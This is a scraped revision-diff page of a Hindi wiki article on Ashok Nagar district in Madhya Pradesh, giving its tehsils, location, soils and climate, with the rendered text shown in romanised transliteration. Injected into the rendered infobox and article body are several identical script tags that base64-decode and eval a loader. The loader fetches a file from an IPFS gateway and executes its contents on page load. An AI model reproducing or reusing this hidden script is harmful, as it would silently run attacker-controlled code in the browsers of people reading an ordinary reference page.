Difference between revisions of "अशोक नगर ज़िला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
 
Line 2: Line 2:
 
|चित्र=blank-1.gif
 
|चित्र=blank-1.gif
 
|चित्र का नाम=
 
|चित्र का नाम=
|राज्य=-
+
|राज्य=[[मध्य प्रदेश]]
 
|मुख्यालय=
 
|मुख्यालय=
|स्थापना=-
+
|स्थापना=[[15 अगस्त]] [[2003]]
 
|जनसंख्या=-
 
|जनसंख्या=-
 
|क्षेत्रफल=-
 
|क्षेत्रफल=-
|भौगोलिक निर्देशांक=-
+
|भौगोलिक निर्देशांक=24.34 अक्षांश<br />
|तहसील=-
+
77.43 देशांतर
 +
|तहसील=अशोक नगर, चंदेरी, ईसागढ़, मुंगावली, नई सराय, पिपरई, शाढ़ौरा
 
|मंडल=-
 
|मंडल=-
 
|खण्डों की सँख्या=-
 
|खण्डों की सँख्या=-
Line 42: Line 43:
 
|पुरुष=-
 
|पुरुष=-
 
|ऊँचाई=-
 
|ऊँचाई=-
|तापमान=-
+
|तापमान=गर्मियों में 47 डिग्री सेल्सियस तक, जबकि सर्दियों में 4 डिग्री सेल्सियस तक
|ग्रीष्म=-
+
|ग्रीष्म=मध्य [[मार्च]] से [[मई]] तक
|शरद=-
+
|शरद=[[अक्टूबर]] से मध्य [[मार्च]] तक
|वर्षा=-
+
|वर्षा=[[जून]] के मध्य से [[सितंबर]] के मध्य तक
 
|दूरभाष कोड=-
 
|दूरभाष कोड=-
|वाहन पंजी.=-
+
|वाहन पंजी.=MP-67
 
|संबंधित लेख=
 
|संबंधित लेख=
|पाठ 1=
+
|पाठ 1=पिन
|शीर्षक 1=
+
|शीर्षक 1=473331
 
|पाठ 2=
 
|पाठ 2=
 
|शीर्षक 2=
 
|शीर्षक 2=
Line 57: Line 58:
 
|अन्य जानकारी=
 
|अन्य जानकारी=
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन=
+
|अद्यतन={{अद्यतन|12:32, 14 अगस्त 2021 (IST)}}
 
}}
 
}}
 
{{ज़िला लेख}}
 
{{ज़िला लेख}}
 +
'''अशोक नगर''' [[सिंध नदी|सिंध]] और [[बेतवा नदी|बेतवा]] नदियों के बीच [[मध्य प्रदेश]] के उत्तरी भाग पर स्थित है। यह मालवा पठार के उत्तरी भाग के अंतर्गत आता है, हालांकि जिले के मुख्य भाग बुंदेलखंड के पठार में स्थित है। भौगोलिक दृष्टि से, जिला 24.34 अक्षांश और 77.43 देशांतर के बीच स्थित है जिले की पूर्वी और पश्चिमी सीमायें नदियों के द्वारा अन्य जिले कि सीमाओं से विभक्त हैं। बेतबा जिले के पूर्वी भाग में बहती है जो कि सागर जिला एवं [[उत्तर प्रदेश]] के ललितपुर जिले से विभक्त करती है तथा सिन्ध मुख्य नदी के रूप में पश्चिमी सीमा के साथ बह रही है। अशोक नगर पूर्व में पछार के नाम से जाना जाता था। यह नगर देश भर में बड़ी अनाज मंडी और शरबती गेंहू ([[गेंहू]] का प्रकार) के लिए जाना जाता है। [[2003]] तक मध्य प्रदेश में अशोक नगर गुना जिले का एक हिस्सा था। प्रशासनिक क्षेत्र के आधार से गुना जिला बड़ा होने पर [[15 अगस्त]] [[2003]] को अशोक नगर को अलग जिला घोषि‍त किया गया।<ref name="pp">{{cite web |url=https://ashoknagar.nic.in/%e0%a4%b0%e0%a5%82%e0%a4%aa%e0%a4%b0%e0%a5%87%e0%a4%96%e0%a4%be/ |title=रूपरेखा|accessmonthday= 14 अगस्त|accessyear=2021 |last= |first= |authorlink= |format= |publisher=ashoknagar.nic.in |language=हिंदी}}</ref>
 +
==तहसील==
 +
जिले में सात तह्सीलें हैं। इनके नाम हैं-
 +
#अशोक नगर
 +
#चंदेरी
 +
#ईसागढ़
 +
#मुंगावली
 +
#नई सराय
 +
#पिपरई
 +
#शाढ़ौरा
 +
==स्थिति==
 +
अशोक नगर जिला [[मध्य प्रदेश]] के [[शिवपुरी]], [[गुना, मध्य प्रदेश|गुना]], [[विदिशा]] और सागर जिलों की सीमाओं से घिरा हुआ है और उत्तर प्रदेश की सीमा भी छूती है। अशोक नगर राजधानी [[भोपाल]] से लगभग 200 किलोमीटर दूर है। यह नगर [[भारत]] के बीचों बीच स्थित है। नगर समुद्र स्तर से ऊपर 507 मीटर (1640 फीट) ऊपर की औसत ऊंचाई पर स्थित है। यह [[पठार]] क्षेत्र में है और एक कृषि स्थलाकृति है। यह पठार डेक्कन प्रसार है एवं 60 और 68 लाख साल अवधि पहले के अंत में इसका गठन का हुआ था।<ref name="pp"/>
 +
==मिट्टी==
 +
इस क्षेत्र में [[मिट्टी]] की मुख्य वर्गों के काले, भूरे रंग के, और भाटोरी मिट्टी (पाषाणमय) हैं। [[ज्वालामुखी]] क्षेत्र की तरह मिट्टी काले रंग के रूप में उच्च लौह सामग्री बेसाल्ट से बनी है। मिट्टी में नमी बनाए रखने की उच्च क्षमता की वजह से कम सिंचाई की आवश्यकता है। अन्य दो प्रकार की मिट्टी हल्की एवं रेत का उच्च अनुपात है।
 +
==मौसम==
 +
गर्मी, बारिश और सर्दी तीनों [[मौसम]] में वर्ष बंटा हुआ है। मध्य [[मार्च]] के महीने से [[मई]] तक गर्मी का मौसम रहता है। गर्मियों के महीनों के दौरान औसत दैनिक [[तापमान]] 35 डिग्री सेल्सियस जो आमतौर पर कुछ दिनों पर 46 डिग्री सेल्सियस तक बढ़ जाता है। सामान्यत: बरसात के मौसम में पहली बारिश [[जून]] के मध्य में शुरू होती है और [[सितंबर]] के मध्य तक चलती है। अधिकांश बारिश दक्षिण-पश्चिम [[मानसून]] के दौरान हो जाती है एवं जो कि 100 से.मी. पश्चिम से 165 से.मी. पूर्व की रेंज में होती है। अशोक नगर और आसपास के क्षेत्र में साल की औसत [[वर्षा]] लगभग 140 से.मी. होती है। सर्दी का मौसम तीनों मौसमों में सबसे लंबे समय तक चलता है जो लगभग पांच महीने तक [[अक्टूबर]] से मध्य मार्च तक रहता है। नगर की जलवायु उप उष्णकटिबंधीय है। गर्मियों में तापमान 47 डिग्री सेल्सियस तक पहुँचता है, जबकि सर्दियों में 4 डिग्री सेल्सियस तक गिर जाता है। वर्षा जिले में पर्याप्त होती है। कभी-कभी कम भी होती है।<ref name="pp"/>
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ज़िले]]
+
==टीका टिप्पणी और संदर्भ==
[[Category:भारत के ज़िले]][[Category:गणराज्य संरचना कोश]]
+
<references/>
 +
==संबंधित लेख==
 +
{{मध्य प्रदेश के ज़िले}}
 +
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ज़िले]][[Category:भारत के ज़िले]][[Category:गणराज्य संरचना कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 07:02, 14 August 2021

ashok nagar zila
rajy madhy pradesh
sthapana 15 agast 2003
janasankhya -
kshetraphal -
bhaugolik nirdeshaank 24.34 akshaansh

77.43 deshaantar

tahasil ashok nagar, chanderi, eesagadh, muangavali, nee saray, piparee, shadhaura
mandal -
khandoan ki sankhya -
adivasi -
vidhan sabha kshetr -
lokasabha -
nagar palika -
nagar nigam -
nagar -
qasbe -
kul gram -
vidyutikrit gram -
mukhy aitihasik sthal -
mukhy paryatan sthal -
vanakshetr -
buaee kshetr -
sianchit kshetr -
nagariy janasankhya -
gramin janasankhya -
rajasv gram -
abadi rahit gram -
abad gram -
nagar panchayat -
gram panchayat -
janapad panchayat -
sima -
anusoochit jati -
anusoochit janajati -
prasiddhi -
liang anupat - ♂/♀
saksharata - %
· stri - %
· purush - %
ooanchaee - samudratal se
tapaman garmiyoan mean 47 digri selsiyas tak, jabaki sardiyoan mean 4 digri selsiyas tak
· grishm madhy march se mee tak
· sharad aktoobar se madhy march tak
varsha joon ke madhy se sitanbar ke madhy tak mimi
doorabhash kod -
vahan panji. MP-67
473331 pin
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

link=| is lekh ka nirman janaganana 2011 ke 'satyapit aank doan' ke abhav mean lambit hai. 2011 ki janaganana ke anumanit aank doan ke upayog se yah lekh nahian banaya jana chahie.

lekh ka adhar bana diya gaya hai. ap isamean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> ashok nagar siandh aur betava nadiyoan ke bich madhy pradesh ke uttari bhag par sthit hai. yah malava pathar ke uttari bhag ke aantargat ata hai, halaanki jile ke mukhy bhag buandelakhand ke pathar mean sthit hai. bhaugolik drishti se, jila 24.34 akshaansh aur 77.43 deshaantar ke bich sthit hai jile ki poorvi aur pashchimi simayean nadiyoan ke dvara any jile ki simaoan se vibhakt haian. betaba jile ke poorvi bhag mean bahati hai jo ki sagar jila evan uttar pradesh ke lalitapur jile se vibhakt karati hai tatha sindh mukhy nadi ke roop mean pashchimi sima ke sath bah rahi hai. ashok nagar poorv mean pachhar ke nam se jana jata tha. yah nagar desh bhar mean b di anaj mandi aur sharabati geanhoo (geanhoo ka prakar) ke lie jana jata hai. 2003 tak madhy pradesh mean ashok nagar guna jile ka ek hissa tha. prashasanik kshetr ke adhar se guna jila b da hone par 15 agast 2003 ko ashok nagar ko alag jila ghoshi‍t kiya gaya.[1]

tahasil

jile mean sat tahsilean haian. inake nam haian-

  1. ashok nagar
  2. chanderi
  3. eesagadh
  4. muangavali
  5. nee saray
  6. piparee
  7. shadhaura

sthiti

ashok nagar jila madhy pradesh ke shivapuri, guna, vidisha aur sagar jiloan ki simaoan se ghira hua hai aur uttar pradesh ki sima bhi chhooti hai. ashok nagar rajadhani bhopal se lagabhag 200 kilomitar door hai. yah nagar bharat ke bichoan bich sthit hai. nagar samudr star se oopar 507 mitar (1640 phit) oopar ki ausat ooanchaee par sthit hai. yah pathar kshetr mean hai aur ek krishi sthalakriti hai. yah pathar dekkan prasar hai evan 60 aur 68 lakh sal avadhi pahale ke aant mean isaka gathan ka hua tha.[1]

mitti

is kshetr mean mitti ki mukhy vargoan ke kale, bhoore rang ke, aur bhatori mitti (pashanamay) haian. jvalamukhi kshetr ki tarah mitti kale rang ke roop mean uchch lauh samagri besalt se bani hai. mitti mean nami banae rakhane ki uchch kshamata ki vajah se kam sianchaee ki avashyakata hai. any do prakar ki mitti halki evan ret ka uchch anupat hai.

mausam

garmi, barish aur sardi tinoan mausam mean varsh banta hua hai. madhy march ke mahine se mee tak garmi ka mausam rahata hai. garmiyoan ke mahinoan ke dauran ausat dainik tapaman 35 digri selsiyas jo amataur par kuchh dinoan par 46 digri selsiyas tak badh jata hai. samanyat: barasat ke mausam mean pahali barish joon ke madhy mean shuroo hoti hai aur sitanbar ke madhy tak chalati hai. adhikaansh barish dakshin-pashchim manasoon ke dauran ho jati hai evan jo ki 100 se.mi. pashchim se 165 se.mi. poorv ki reanj mean hoti hai. ashok nagar aur asapas ke kshetr mean sal ki ausat varsha lagabhag 140 se.mi. hoti hai. sardi ka mausam tinoan mausamoan mean sabase lanbe samay tak chalata hai jo lagabhag paanch mahine tak aktoobar se madhy march tak rahata hai. nagar ki jalavayu up ushnakatibandhiy hai. garmiyoan mean tapaman 47 digri selsiyas tak pahuanchata hai, jabaki sardiyoan mean 4 digri selsiyas tak gir jata hai. varsha jile mean paryapt hoti hai. kabhi-kabhi kam bhi hoti hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 rooparekha (hiandi) ashoknagar.nic.in. abhigaman tithi: 14 agast, 2021.

sanbandhit lekh